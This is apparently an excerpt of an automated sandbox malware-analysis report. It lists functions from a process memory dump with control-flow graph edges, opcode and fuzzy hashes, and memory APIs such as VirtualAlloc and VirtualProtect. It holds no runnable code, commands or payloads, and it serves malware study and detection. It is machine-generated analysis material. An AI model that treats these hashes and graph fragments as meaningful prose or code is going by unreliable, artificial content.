429->430 430->419
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 159d51c20fb73537085b3acd7a678ab786ba9a651d26329173d9a9e98984f08c
                                                                                                                                • Instruction ID: 3fdef0005d9d4cf974091b70eb0923d366d47bf3f79926a5e3ddbb4710750f6e
                                                                                                                                • Opcode Fuzzy Hash: 159d51c20fb73537085b3acd7a678ab786ba9a651d26329173d9a9e98984f08c
                                                                                                                                • Instruction Fuzzy Hash: 71B2B270A1991D8FDBA4EF58C8A5BA9B7B1FF58301F1042E9D01DD32A6DA356E81CF40
                                                                                                                                Function 00007FFD9B78C5AF Relevance: .8, Instructions: 776COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 581 7ffd9b78c5af-7ffd9b78c5e7 585 7ffd9b78ca47-7ffd9b78ca4d 581->585 586 7ffd9b78c5ec-7ffd9b78c68a 585->586 587 7ffd9b78ca53-7ffd9b78ca87 call 7ffd9b78dc96 585->587 599 7ffd9b78c6ba-7ffd9b78c6c9 586->599 600 7ffd9b78c68c-7ffd9b78c6af 586->600 597 7ffd9b78ca89-7ffd9b78ca97 587->597 601 7ffd9b78caa2-7ffd9b78cb49 597->601 603 7ffd9b78c6cb 599->603 604 7ffd9b78c6d0-7ffd9b78c6df 599->604 600->599 621 7ffd9b78cc56-7ffd9b78ccae 601->621 622 7ffd9b78cb4f-7ffd9b78cb66 601->622 603->604 606 7ffd9b78c6e1-7ffd9b78c6ef 604->606 607 7ffd9b78c6f4-7ffd9b78c70f 604->607 612 7ffd9b78ca26-7ffd9b78ca44 606->612 608 7ffd9b78c72f-7ffd9b78ca1b 607->608 609 7ffd9b78c711-7ffd9b78c72b 607->609 608->612 609->608 612->585 633 7ffd9b78ce45-7ffd9b78cf21 621->633 634 7ffd9b78ccb4-7ffd9b78ccff 621->634 625 7ffd9b78cb68-7ffd9b78cbb3 622->625 626 7ffd9b78cbb4-7ffd9b78cc4d 622->626 625->626 626->621 656 7ffd9b78cc4f 626->656 667 7ffd9b78cf27-7ffd9b78d000 633->667 668 7ffd9b78d002-7ffd9b78d048 633->668 643 7ffd9b78ce2c-7ffd9b78ce39 634->643 645 7ffd9b78ce3f-7ffd9b78ce40 643->645 646 7ffd9b78cd04-7ffd9b78cd12 643->646 650 7ffd9b78d1fd-7ffd9b78d25c 645->650 648 7ffd9b78cd19-7ffd9b78cd99 646->648 649 7ffd9b78cd14 646->649 664 7ffd9b78cd9b 648->664 665 7ffd9b78cda0-7ffd9b78ce1a 648->665 649->648 663 7ffd9b78d524-7ffd9b78d551 650->663 656->621 673 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 663->673 674 7ffd9b78d261-7ffd9b78d29d 663->674 664->665 697 7ffd9b78ce1c-7ffd9b78ce21 665->697 698 7ffd9b78ce24-7ffd9b78ce29 665->698 687 7ffd9b78d04f-7ffd9b78d055 667->687 668->687 692 7ffd9b78d57d 673->692 693 7ffd9b78d584-7ffd9b78d5b8 673->693 682 7ffd9b78d2ba-7ffd9b78d521 674->682 683 7ffd9b78d29f-7ffd9b78d2b6 674->683 682->663 683->682 690 7ffd9b78d1ea-7ffd9b78d1f7 687->690 690->650 695 7ffd9b78d05a-7ffd9b78d068 690->695 692->693 705 7ffd9b78d5d8-7ffd9b78d5f5 693->705 706 7ffd9b78d5ba-7ffd9b78d5c7 693->706 699 7ffd9b78d06a 695->699 700 7ffd9b78d06f-7ffd9b78d10f 695->700 697->698 698->643 699->700 738 7ffd9b78d17f-7ffd9b78d1a7 700->738 739 7ffd9b78d111-7ffd9b78d139 700->739 712 7ffd9b78d5fb-7ffd9b78d6f9 705->712 713 7ffd9b78d7b4-7ffd9b78d7b8 705->713 709 7ffd9b78d5c9 706->709 710 7ffd9b78d5ce-7ffd9b78d5d6 706->710 709->710 710->705 712->713 769 7ffd9b78d6ff-7ffd9b78d70b 712->769 716 7ffd9b78dac7-7ffd9b78db1f 713->716 717 7ffd9b78d7be-7ffd9b78d7c7 713->717 735 7ffd9b78db25-7ffd9b78dbba 716->735 736 7ffd9b78dc87-7ffd9b78dc95 716->736 720 7ffd9b78d7c9-7ffd9b78d7ce 717->720 721 7ffd9b78d7d1-7ffd9b78d7da 717->721 720->721 724 7ffd9b78dab1-7ffd9b78dac1 721->724 724->716 728 7ffd9b78d7df-7ffd9b78d7f0 724->728 729 7ffd9b78d7f7-7ffd9b78d897 728->729 730 7ffd9b78d7f2 728->730 763 7ffd9b78d89d-7ffd9b78d8fd 729->763 764 7ffd9b78daa3-7ffd9b78daab 729->764 730->729 735->736 768 7ffd9b78dbc0-7ffd9b78dbd1 735->768 740 7ffd9b78d1a9 738->740 741 7ffd9b78d1ae-7ffd9b78d1d7 738->741 745 7ffd9b78d13b 739->745 746 7ffd9b78d140-7ffd9b78d17d 739->746 740->741 753 7ffd9b78d1e2-7ffd9b78d1e7 741->753 745->746 746->753 753->690 778 7ffd9b78d8ff 763->778 779 7ffd9b78d904-7ffd9b78d90d 763->779 764->724 771 7ffd9b78dbd8-7ffd9b78dc85 768->771 772 7ffd9b78dbd3 768->772 769->713 773 7ffd9b78d711-7ffd9b78d7a9 769->773 771->736 772->771 773->713 778->779 781 7ffd9b78da7c-7ffd9b78da8a 779->781 782 7ffd9b78d913-7ffd9b78d96b 779->782 786 7ffd9b78da8c 781->786 787 7ffd9b78da91-7ffd9b78da99 781->787 794 7ffd9b78d9f7-7ffd9b78da25 782->794 795 7ffd9b78d971-7ffd9b78d99d 782->795 786->787 788 7ffd9b78da9b-7ffd9b78daa0 787->788 788->764 796 7ffd9b78da27 794->796 797 7ffd9b78da2c-7ffd9b78da7a 794->797 798 7ffd9b78d99f 795->798 799 7ffd9b78d9a4-7ffd9b78d9f2 795->799 796->797 797->788 798->799 799->788
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 548eee18ddbc442b902b9ac3c404e05247acb586ff082642feac4c2175be50ec
                                                                                                                                • Instruction ID: 522573daf230ae2b2fd0a3d5015f4579c0af6f702689c719f5d0ed17ba2d03bd
                                                                                                                                • Opcode Fuzzy Hash: 548eee18ddbc442b902b9ac3c404e05247acb586ff082642feac4c2175be50ec
                                                                                                                                • Instruction Fuzzy Hash: C962D171A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B78C84E Relevance: .7, Instructions: 721COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 804 7ffd9b78c84e-7ffd9b78c850 805 7ffd9b78c8cc-7ffd9b78c8de 804->805 806 7ffd9b78c852-7ffd9b78c879 804->806 808 7ffd9b78c95b-7ffd9b78c96f 805->808 809 7ffd9b78c8e0-7ffd9b78c907 805->809 806->805 812 7ffd9b78c9c8-7ffd9b78c9ce 808->812 809->808 814 7ffd9b78c9d0-7ffd9b78c9df 812->814 815 7ffd9b78c971-7ffd9b78c9ac 812->815 816 7ffd9b78ca0f-7ffd9b78ca1b 814->816 818 7ffd9b78c9ae 815->818 819 7ffd9b78c9b3-7ffd9b78c9c5 815->819 820 7ffd9b78ca26-7ffd9b78ca4d 816->820 818->819 819->812 823 7ffd9b78c5ec-7ffd9b78c68a 820->823 824 7ffd9b78ca53-7ffd9b78ca87 call 7ffd9b78dc96 820->824 836 7ffd9b78c6ba-7ffd9b78c6c9 823->836 837 7ffd9b78c68c-7ffd9b78c6af 823->837 834 7ffd9b78ca89-7ffd9b78ca97 824->834 838 7ffd9b78caa2-7ffd9b78cb49 834->838 840 7ffd9b78c6cb 836->840 841 7ffd9b78c6d0-7ffd9b78c6df 836->841 837->836 855 7ffd9b78cc56-7ffd9b78ccae 838->855 856 7ffd9b78cb4f-7ffd9b78cb66 838->856 840->841 843 7ffd9b78c6e1-7ffd9b78c6ef 841->843 844 7ffd9b78c6f4-7ffd9b78c70f 841->844 843->820 845 7ffd9b78c72f-7ffd9b78ca04 844->845 846 7ffd9b78c711-7ffd9b78c72b 844->846 845->816 846->845 867 7ffd9b78ce45-7ffd9b78cf21 855->867 868 7ffd9b78ccb4-7ffd9b78ccff 855->868 859 7ffd9b78cb68-7ffd9b78cbb3 856->859 860 7ffd9b78cbb4-7ffd9b78cc4d 856->860 859->860 860->855 890 7ffd9b78cc4f 860->890 901 7ffd9b78cf27-7ffd9b78d000 867->901 902 7ffd9b78d002-7ffd9b78d048 867->902 877 7ffd9b78ce2c-7ffd9b78ce39 868->877 879 7ffd9b78ce3f-7ffd9b78ce40 877->879 880 7ffd9b78cd04-7ffd9b78cd12 877->880 884 7ffd9b78d1fd-7ffd9b78d25c 879->884 882 7ffd9b78cd19-7ffd9b78cd99 880->882 883 7ffd9b78cd14 880->883 898 7ffd9b78cd9b 882->898 899 7ffd9b78cda0-7ffd9b78ce1a 882->899 883->882 897 7ffd9b78d524-7ffd9b78d551 884->897 890->855 907 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 897->907 908 7ffd9b78d261-7ffd9b78d29d 897->908 898->899 931 7ffd9b78ce1c-7ffd9b78ce21 899->931 932 7ffd9b78ce24-7ffd9b78ce29 899->932 921 7ffd9b78d04f-7ffd9b78d055 901->921 902->921 926 7ffd9b78d57d 907->926 927 7ffd9b78d584-7ffd9b78d5b8 907->927 916 7ffd9b78d2ba-7ffd9b78d521 908->916 917 7ffd9b78d29f-7ffd9b78d2b6 908->917 916->897 917->916 924 7ffd9b78d1ea-7ffd9b78d1f7 921->924 924->884 929 7ffd9b78d05a-7ffd9b78d068 924->929 926->927 939 7ffd9b78d5d8-7ffd9b78d5f5 927->939 940 7ffd9b78d5ba-7ffd9b78d5c7 927->940 933 7ffd9b78d06a 929->933 934 7ffd9b78d06f-7ffd9b78d10f 929->934 931->932 932->877 933->934 972 7ffd9b78d17f-7ffd9b78d1a7 934->972 973 7ffd9b78d111-7ffd9b78d139 934->973 946 7ffd9b78d5fb-7ffd9b78d6f9 939->946 947 7ffd9b78d7b4-7ffd9b78d7b8 939->947 943 7ffd9b78d5c9 940->943 944 7ffd9b78d5ce-7ffd9b78d5d6 940->944 943->944 944->939 946->947 1003 7ffd9b78d6ff-7ffd9b78d70b 946->1003 950 7ffd9b78dac7-7ffd9b78db1f 947->950 951 7ffd9b78d7be-7ffd9b78d7c7 947->951 969 7ffd9b78db25-7ffd9b78dbba 950->969 970 7ffd9b78dc87-7ffd9b78dc95 950->970 954 7ffd9b78d7c9-7ffd9b78d7ce 951->954 955 7ffd9b78d7d1-7ffd9b78d7da 951->955 954->955 958 7ffd9b78dab1-7ffd9b78dac1 955->958 958->950 962 7ffd9b78d7df-7ffd9b78d7f0 958->962 963 7ffd9b78d7f7-7ffd9b78d897 962->963 964 7ffd9b78d7f2 962->964 997 7ffd9b78d89d-7ffd9b78d8fd 963->997 998 7ffd9b78daa3-7ffd9b78daab 963->998 964->963 969->970 1002 7ffd9b78dbc0-7ffd9b78dbd1 969->1002 974 7ffd9b78d1a9 972->974 975 7ffd9b78d1ae-7ffd9b78d1d7 972->975 979 7ffd9b78d13b 973->979 980 7ffd9b78d140-7ffd9b78d17d 973->980 974->975 987 7ffd9b78d1e2-7ffd9b78d1e7 975->987 979->980 980->987 987->924 1012 7ffd9b78d8ff 997->1012 1013 7ffd9b78d904-7ffd9b78d90d 997->1013 998->958 1005 7ffd9b78dbd8-7ffd9b78dc85 1002->1005 1006 7ffd9b78dbd3 1002->1006 1003->947 1007 7ffd9b78d711-7ffd9b78d7a9 1003->1007 1005->970 1006->1005 1007->947 1012->1013 1015 7ffd9b78da7c-7ffd9b78da8a 1013->1015 1016 7ffd9b78d913-7ffd9b78d96b 1013->1016 1020 7ffd9b78da8c 1015->1020 1021 7ffd9b78da91-7ffd9b78da99 1015->1021 1028 7ffd9b78d9f7-7ffd9b78da25 1016->1028 1029 7ffd9b78d971-7ffd9b78d99d 1016->1029 1020->1021 1022 7ffd9b78da9b-7ffd9b78daa0 1021->1022 1022->998 1030 7ffd9b78da27 1028->1030 1031 7ffd9b78da2c-7ffd9b78da7a 1028->1031 1032 7ffd9b78d99f 1029->1032 1033 7ffd9b78d9a4-7ffd9b78d9f2 1029->1033 1030->1031 1031->1022 1032->1033 1033->1022
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8e7099fa27a386b45f28b1ed8c03663c151692661ce5e37982b405b3932ce42b
                                                                                                                                • Instruction ID: 48693d4b18ce0526ac5d9d97488c8d4cb52cc6086d1461ce695793b8a03c522b
                                                                                                                                • Opcode Fuzzy Hash: 8e7099fa27a386b45f28b1ed8c03663c151692661ce5e37982b405b3932ce42b
                                                                                                                                • Instruction Fuzzy Hash: 6752CF71A19A1D8FDBA8DF58C8A5BA9B7B1FF58301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B78C782 Relevance: .7, Instructions: 684COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1038 7ffd9b78c782-7ffd9b78c805 1043 7ffd9b78ca0f-7ffd9b78ca1b 1038->1043 1044 7ffd9b78ca26-7ffd9b78ca4d 1043->1044 1047 7ffd9b78c5ec-7ffd9b78c68a 1044->1047 1048 7ffd9b78ca53-7ffd9b78ca87 call 7ffd9b78dc96 1044->1048 1060 7ffd9b78c6ba-7ffd9b78c6c9 1047->1060 1061 7ffd9b78c68c-7ffd9b78c6af 1047->1061 1058 7ffd9b78ca89-7ffd9b78ca97 1048->1058 1062 7ffd9b78caa2-7ffd9b78cb49 1058->1062 1064 7ffd9b78c6cb 1060->1064 1065 7ffd9b78c6d0-7ffd9b78c6df 1060->1065 1061->1060 1079 7ffd9b78cc56-7ffd9b78ccae 1062->1079 1080 7ffd9b78cb4f-7ffd9b78cb66 1062->1080 1064->1065 1067 7ffd9b78c6e1-7ffd9b78c6ef 1065->1067 1068 7ffd9b78c6f4-7ffd9b78c70f 1065->1068 1067->1044 1069 7ffd9b78c72f-7ffd9b78ca04 1068->1069 1070 7ffd9b78c711-7ffd9b78c72b 1068->1070 1069->1043 1070->1069 1091 7ffd9b78ce45-7ffd9b78cf21 1079->1091 1092 7ffd9b78ccb4-7ffd9b78ccff 1079->1092 1083 7ffd9b78cb68-7ffd9b78cbb3 1080->1083 1084 7ffd9b78cbb4-7ffd9b78cc4d 1080->1084 1083->1084 1084->1079 1114 7ffd9b78cc4f 1084->1114 1125 7ffd9b78cf27-7ffd9b78d000 1091->1125 1126 7ffd9b78d002-7ffd9b78d048 1091->1126 1101 7ffd9b78ce2c-7ffd9b78ce39 1092->1101 1103 7ffd9b78ce3f-7ffd9b78ce40 1101->1103 1104 7ffd9b78cd04-7ffd9b78cd12 1101->1104 1108 7ffd9b78d1fd-7ffd9b78d25c 1103->1108 1106 7ffd9b78cd19-7ffd9b78cd99 1104->1106 1107 7ffd9b78cd14 1104->1107 1122 7ffd9b78cd9b 1106->1122 1123 7ffd9b78cda0-7ffd9b78ce1a 1106->1123 1107->1106 1121 7ffd9b78d524-7ffd9b78d551 1108->1121 1114->1079 1131 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 1121->1131 1132 7ffd9b78d261-7ffd9b78d29d 1121->1132 1122->1123 1155 7ffd9b78ce1c-7ffd9b78ce21 1123->1155 1156 7ffd9b78ce24-7ffd9b78ce29 1123->1156 1145 7ffd9b78d04f-7ffd9b78d055 1125->1145 1126->1145 1150 7ffd9b78d57d 1131->1150 1151 7ffd9b78d584-7ffd9b78d5b8 1131->1151 1140 7ffd9b78d2ba-7ffd9b78d521 1132->1140 1141 7ffd9b78d29f-7ffd9b78d2b6 1132->1141 1140->1121 1141->1140 1148 7ffd9b78d1ea-7ffd9b78d1f7 1145->1148 1148->1108 1153 7ffd9b78d05a-7ffd9b78d068 1148->1153 1150->1151 1163 7ffd9b78d5d8-7ffd9b78d5f5 1151->1163 1164 7ffd9b78d5ba-7ffd9b78d5c7 1151->1164 1157 7ffd9b78d06a 1153->1157 1158 7ffd9b78d06f-7ffd9b78d10f 1153->1158 1155->1156 1156->1101 1157->1158 1196 7ffd9b78d17f-7ffd9b78d1a7 1158->1196 1197 7ffd9b78d111-7ffd9b78d139 1158->1197 1170 7ffd9b78d5fb-7ffd9b78d6f9 1163->1170 1171 7ffd9b78d7b4-7ffd9b78d7b8 1163->1171 1167 7ffd9b78d5c9 1164->1167 1168 7ffd9b78d5ce-7ffd9b78d5d6 1164->1168 1167->1168 1168->1163 1170->1171 1227 7ffd9b78d6ff-7ffd9b78d70b 1170->1227 1174 7ffd9b78dac7-7ffd9b78db1f 1171->1174 1175 7ffd9b78d7be-7ffd9b78d7c7 1171->1175 1193 7ffd9b78db25-7ffd9b78dbba 1174->1193 1194 7ffd9b78dc87-7ffd9b78dc95 1174->1194 1178 7ffd9b78d7c9-7ffd9b78d7ce 1175->1178 1179 7ffd9b78d7d1-7ffd9b78d7da 1175->1179 1178->1179 1182 7ffd9b78dab1-7ffd9b78dac1 1179->1182 1182->1174 1186 7ffd9b78d7df-7ffd9b78d7f0 1182->1186 1187 7ffd9b78d7f7-7ffd9b78d897 1186->1187 1188 7ffd9b78d7f2 1186->1188 1221 7ffd9b78d89d-7ffd9b78d8fd 1187->1221 1222 7ffd9b78daa3-7ffd9b78daab 1187->1222 1188->1187 1193->1194 1226 7ffd9b78dbc0-7ffd9b78dbd1 1193->1226 1198 7ffd9b78d1a9 1196->1198 1199 7ffd9b78d1ae-7ffd9b78d1d7 1196->1199 1203 7ffd9b78d13b 1197->1203 1204 7ffd9b78d140-7ffd9b78d17d 1197->1204 1198->1199 1211 7ffd9b78d1e2-7ffd9b78d1e7 1199->1211 1203->1204 1204->1211 1211->1148 1236 7ffd9b78d8ff 1221->1236 1237 7ffd9b78d904-7ffd9b78d90d 1221->1237 1222->1182 1229 7ffd9b78dbd8-7ffd9b78dc85 1226->1229 1230 7ffd9b78dbd3 1226->1230 1227->1171 1231 7ffd9b78d711-7ffd9b78d7a9 1227->1231 1229->1194 1230->1229 1231->1171 1236->1237 1239 7ffd9b78da7c-7ffd9b78da8a 1237->1239 1240 7ffd9b78d913-7ffd9b78d96b 1237->1240 1244 7ffd9b78da8c 1239->1244 1245 7ffd9b78da91-7ffd9b78da99 1239->1245 1252 7ffd9b78d9f7-7ffd9b78da25 1240->1252 1253 7ffd9b78d971-7ffd9b78d99d 1240->1253 1244->1245 1246 7ffd9b78da9b-7ffd9b78daa0 1245->1246 1246->1222 1254 7ffd9b78da27 1252->1254 1255 7ffd9b78da2c-7ffd9b78da7a 1252->1255 1256 7ffd9b78d99f 1253->1256 1257 7ffd9b78d9a4-7ffd9b78d9f2 1253->1257 1254->1255 1255->1246 1256->1257 1257->1246
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f7359aafe8b9e01af71614c79a1d93052d0d2e2bbe284f32ed8675eaf9dbbec5
                                                                                                                                • Instruction ID: bde6bb574bcf290c282cdff5e1129d6d2d3647fe1e59d8ad38c685ee7895af45
                                                                                                                                • Opcode Fuzzy Hash: f7359aafe8b9e01af71614c79a1d93052d0d2e2bbe284f32ed8675eaf9dbbec5
                                                                                                                                • Instruction Fuzzy Hash: 6342C171A1991D8FDBA8DB58C8A5BA9B7B1FB58301F1042E9D00DD32A6DE356E81CF40
                                                                                                                                Function 00007FFD9B78C926 Relevance: .7, Instructions: 675COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d10ea69be001cb7d20e7e8204546f08279af133b0e6a52beed0d2275e3c96319
                                                                                                                                • Instruction ID: bcdaf43e4e97889855796bfbba1a9653593ddccb242de1c1f8cf89956fbbfbdf
                                                                                                                                • Opcode Fuzzy Hash: d10ea69be001cb7d20e7e8204546f08279af133b0e6a52beed0d2275e3c96319
                                                                                                                                • Instruction Fuzzy Hash: 9D42CF71A19A1D8FDBA8DF58C8A5BA9B7B1FF58301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B78C735 Relevance: .7, Instructions: 663COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 18aba7f2e37a4082b2713fba2516adbc37d78db075ee5dc4481488b0d7e7f2f3
                                                                                                                                • Instruction ID: ee2e87a9011a913c12cf888a38a748ea22339f3db944296e9bacf3e6da28f0fc
                                                                                                                                • Opcode Fuzzy Hash: 18aba7f2e37a4082b2713fba2516adbc37d78db075ee5dc4481488b0d7e7f2f3
                                                                                                                                • Instruction Fuzzy Hash: A642C171A19A1D8FDBA8DF58C8A5BA9B7B1FB58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B78C90C Relevance: .6, Instructions: 647COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7cb8ab9712c660d58501ec69f7273e25f5d2639fbbb7c765cade1eae6db75dd2
                                                                                                                                • Instruction ID: 7480970ea89ad9894b2c992320178d8abdd2525c54aa0b7afc656e8ebba58f92
                                                                                                                                • Opcode Fuzzy Hash: 7cb8ab9712c660d58501ec69f7273e25f5d2639fbbb7c765cade1eae6db75dd2
                                                                                                                                • Instruction Fuzzy Hash: 4C42D271A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B78C919 Relevance: .6, Instructions: 644COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B78B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b78b000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a29f3b4641dbc470e1ccc6eb458edc93ab2eec3b290e50481f278aebe619cb4
                                                                                                                                • Instruction ID: 2a4de4cdd3805e878ec8c979ee3224d6effab27a79a92725da87183f575dfe1c
                                                                                                                                • Opcode Fuzzy Hash: 4a29f3b4641dbc470e1ccc6eb458edc93ab2eec3b290e50481f278aebe619cb4
                                                                                                                                • Instruction Fuzzy Hash: 6342C171A19A1D8FDBA8DB58C8A5BA9B7B1FF58301F1042E9D00DD32A5DE356E81CF40
                                                                                                                                Function 00007FFD9B771AC5 Relevance: .3, Instructions: 275COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b770000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 98a2a765ce37b75938a4ad1a59626ae131aceebb95ca900ea863946603514512
                                                                                                                                • Instruction ID: 5981fcaabf789c5f1915f271222c321ecfb88b6499b26e81a2173263f88ab8ae
                                                                                                                                • Opcode Fuzzy Hash: 98a2a765ce37b75938a4ad1a59626ae131aceebb95ca900ea863946603514512
                                                                                                                                • Instruction Fuzzy Hash: 35A1A071A18A8D8FE788DF98D8A97ED7BE1FF54304F0042BAE049D36E6CAB814018740
                                                                                                                                Function 00007FFD9B78295E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B77C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b77c000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 544645111-0
                                                                                                                                • Opcode ID: 4e0d404c616cf1f9b3bda597fda336aba952f90ef30de8f1c67258813ea5f11d
                                                                                                                                • Instruction ID: ba501eb7de8b932c4c895968e79aaefc5c11451732a949880185e6059f82983f
                                                                                                                                • Opcode Fuzzy Hash: 4e0d404c616cf1f9b3bda597fda336aba952f90ef30de8f1c67258813ea5f11d
                                                                                                                                • Instruction Fuzzy Hash: 6A519F30D0874D8FDB54DFA8C885AEDBBF0FB66311F1042AAD449E3256DB74A885CB81
                                                                                                                                Function 00007FFD9B78434D Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 154 7ffd9b78434d-7ffd9b784483 VirtualAlloc 159 7ffd9b78448b-7ffd9b7844ef 154->159 160 7ffd9b784485 154->160 160->159
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000014.00000002.1927008128.00007FFD9B77C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_20_2_7ffd9b77c000_ZDtOzYsYYWKWEhNYzFc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 33bd41c9a0fa94eb67b77d6a1998b07768b45283d2ce030052e4e082c86eda80
                                                                                                                                • Instruction ID: 17ae631fba34da56ee0271d6d853e5a1d38c5d9f04af168946418d53cf33bee6
                                                                                                                                • Opcode Fuzzy Hash: 33bd41c9a0fa94eb67b77d6a1998b07768b45283d2ce030052e4e082c86eda80
                                                                                                                                • Instruction Fuzzy Hash: 86515B70908A5C8FDF94EF68C885BE9BBF1FB69310F1041AAD04DE3251CB71A9858F80
                                                                                                                                Function 00007FFD9B771575 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
